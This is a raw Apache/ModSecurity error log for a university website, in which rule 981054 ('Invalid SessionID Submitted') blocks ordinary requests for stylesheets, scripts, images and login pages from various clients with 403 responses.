[Mon Aug 28 07:47:01.170066 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOvuhcCo-f0AAJSxYiEAAAAH"]
[Mon Aug 28 07:47:01.195998 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOvuhcCo-f0AAJSyp2QAAAAM"]
[Mon Aug 28 07:47:01.239587 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOvuhcCo-f0AAJS2FX4AAAAY"]
[Mon Aug 28 07:47:01.240130 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOvuhcCo-f0AAJSyp2UAAAAM"]
[Mon Aug 28 07:47:01.240268 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOvuhcCo-f0AAJS1nFYAAAAX"]
[Mon Aug 28 07:47:01.240744 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOvuhcCo-f0AAJS0EiQAAAAW"]
[Mon Aug 28 07:47:01.276477 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOvuhcCo-f0AAJSxYiIAAAAH"]
[Mon Aug 28 07:47:01.278094 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOvuhcCo-f0AAJS1nFcAAAAX"]
[Mon Aug 28 07:47:01.278453 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOvuhcCo-f0AAJS2FX8AAAAY"]
[Mon Aug 28 07:47:01.279361 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOvuhcCo-f0AAJSyp2YAAAAM"]
[Mon Aug 28 07:47:01.300485 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOvuhcCo-f0AAJS0EiUAAAAW"]
[Mon Aug 28 07:47:01.307888 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOvuhcCo-f0AAJSxYiMAAAAH"]
[Mon Aug 28 07:47:01.307925 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOvuhcCo-f0AAJSyp2cAAAAM"]
[Mon Aug 28 07:47:01.373599 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOvuhcCo-f0AAJS1nFgAAAAX"]
[Mon Aug 28 07:47:01.406253 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOvuhcCo-f0AAJSyp2gAAAAM"]
[Mon Aug 28 07:47:01.430485 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOvuhcCo-f0AAJS0EiYAAAAW"]
[Mon Aug 28 07:47:01.454927 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOvuhcCo-f0AAJS2FYAAAAAY"]
[Mon Aug 28 07:47:01.478784 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOvuhcCo-f0AAJSxYiQAAAAH"]
[Mon Aug 28 07:47:01.508601 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOvuhcCo-f0AAJSyp2kAAAAM"]
[Mon Aug 28 07:47:01.534265 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOvuhcCo-f0AAJSxYiUAAAAH"]
[Mon Aug 28 07:47:06.191136 2023] [:error] [pid 38066] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvuisCo-f0AAJSyp2wAAAAM"]
[Mon Aug 28 07:47:06.240600 2023] [:error] [pid 37616] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvuisCo-f0AAJLwYUAAAAAB"]
[Mon Aug 28 07:47:06.240647 2023] [:error] [pid 38058] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvuisCo-f0AAJSq2lwAAAAC"]
[Mon Aug 28 07:47:06.244921 2023] [:error] [pid 38023] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvuisCo-f0AAJSHtckAAAAD"]
[Mon Aug 28 07:47:06.338497 2023] [:error] [pid 38066] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvuisCo-f0AAJSyp20AAAAM"]
[Mon Aug 28 07:47:06.731303 2023] [:error] [pid 38072] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvuisCo-f0AAJS4IHgAAAAa"]
[Mon Aug 28 07:47:11.303339 2023] [:error] [pid 38070] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvuj8Co-f0AAJS2FYIAAAAY"]
[Mon Aug 28 07:47:11.540001 2023] [:error] [pid 37616] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuj8Co-f0AAJLwYUIAAAAB"]
[Mon Aug 28 07:47:14.861381 2023] [:error] [pid 37916] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvuksCo-f0AAJQcJ30AAAAF"]
[Mon Aug 28 07:47:21.820853 2023] [:error] [pid 38070] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvumcCo-f0AAJS2FYUAAAAY"]
[Mon Aug 28 07:47:27.035578 2023] [:error] [pid 38024] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvun8Co-f0AAJSIdyMAAAAK"]
[Mon Aug 28 07:47:27.382578 2023] [:error] [pid 38070] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvun8Co-f0AAJS2FYYAAAAY"]
[Mon Aug 28 07:47:29.137391 2023] [:error] [pid 38062] [client 114.79.49.141] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvuocCo-f0AAJSuHroAAAAS"]
[Mon Aug 28 07:47:33.139794 2023] [:error] [pid 38068] [client 114.122.116.210] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOvupcCo-f0AAJS0EiwAAAAW"]
[Mon Aug 28 07:47:33.339138 2023] [:error] [pid 38064] [client 114.122.106.38] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvupcCo-f0AAJSw6ZoAAAAU"]
[Mon Aug 28 07:48:01.950820 2023] [:error] [pid 38066] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvuwcCo-f0AAJSyp28AAAAM"]
[Mon Aug 28 07:48:02.215520 2023] [:error] [pid 38069] [client 114.122.106.62] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvuwsCo-f0AAJS1nGYAAAAX"]
[Mon Aug 28 07:48:02.444373 2023] [:error] [pid 38067] [client 114.122.107.206] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuwsCo-f0AAJSz5pkAAAAV"]
[Mon Aug 28 07:48:02.447379 2023] [:error] [pid 38060] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuwsCo-f0AAJSsrPQAAAAQ"]
[Mon Aug 28 07:48:04.963902 2023] [:error] [pid 38058] [client 114.122.116.206] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvuxMCo-f0AAJSq2mQAAAAC"]
[Mon Aug 28 07:48:05.064083 2023] [:error] [pid 38066] [client 114.122.106.62] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuxcCo-f0AAJSyp3AAAAAM"]
[Mon Aug 28 07:48:11.335153 2023] [:error] [pid 38066] [client 114.122.107.130] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvuy8Co-f0AAJSyp3EAAAAM"]
[Mon Aug 28 07:48:11.684144 2023] [:error] [pid 38023] [client 114.122.107.150] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuy8Co-f0AAJSHtdcAAAAD"]
[Mon Aug 28 07:49:04.376257 2023] [:error] [pid 38060] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvvAMCo-f0AAJSsrP8AAAAQ"]
[Mon Aug 28 07:49:06.729017 2023] [:error] [pid 38064] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvvAsCo-f0AAJSw6a0AAAAU"]
[Mon Aug 28 07:49:12.152105 2023] [:error] [pid 38061] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvvCMCo-f0AAJSt5VIAAAAR"]
[Mon Aug 28 07:49:28.413338 2023] [:error] [pid 38065] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvvGMCo-f0AAJSxYjIAAAAH"]
[Mon Aug 28 07:49:28.474797 2023] [:error] [pid 38062] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvvGMCo-f0AAJSuHtIAAAAS"]
[Mon Aug 28 07:49:28.475056 2023] [:error] [pid 38058] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvvGMCo-f0AAJSq2nYAAAAC"]
[Mon Aug 28 07:49:28.475689 2023] [:error] [pid 38068] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvvGMCo-f0AAJS0EkAAAAAW"]
[Mon Aug 28 07:49:28.715314 2023] [:error] [pid 38062] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvvGMCo-f0AAJSuHtMAAAAS"]
[Mon Aug 28 07:49:38.175537 2023] [:error] [pid 38067] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvvIsCo-f0AAJSz5qAAAAAV"]
[Mon Aug 28 07:49:38.429407 2023] [:error] [pid 38066] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvvIsCo-f0AAJSyp4YAAAAM"]
[Mon Aug 28 07:49:58.352427 2023] [:error] [pid 38060] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvvNsCo-f0AAJSsrQ0AAAAQ"]
[Mon Aug 28 07:49:58.697175 2023] [:error] [pid 38065] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvvNsCo-f0AAJSxYjoAAAAH"]
[Mon Aug 28 07:50:03.445024 2023] [:error] [pid 38059] [client 58.11.59.69] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvvO8Co-f0AAJSr2fwAAAAO"]
[Mon Aug 28 07:54:52.563544 2023] [:error] [pid 37539] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvwXMCo-f0AAJKjZ08AAAAG"]
[Mon Aug 28 07:54:52.567314 2023] [:error] [pid 38113] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvwXMCo-f0AAJTh5GIAAAAD"]
[Mon Aug 28 07:54:52.610461 2023] [:error] [pid 38065] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvwXMCo-f0AAJSxYmcAAAAH"]
[Mon Aug 28 07:54:52.651511 2023] [:error] [pid 38068] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvwXMCo-f0AAJS0EnYAAAAW"]
[Mon Aug 28 07:54:52.748961 2023] [:error] [pid 37539] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvwXMCo-f0AAJKjZ1AAAAAG"]
[Mon Aug 28 07:54:57.259044 2023] [:error] [pid 38061] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvwYcCo-f0AAJSt5VkAAAAR"]
[Mon Aug 28 07:54:57.384142 2023] [:error] [pid 38075] [client 146.75.160.28] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvwYcCo-f0AAJS7RwoAAAAB"]
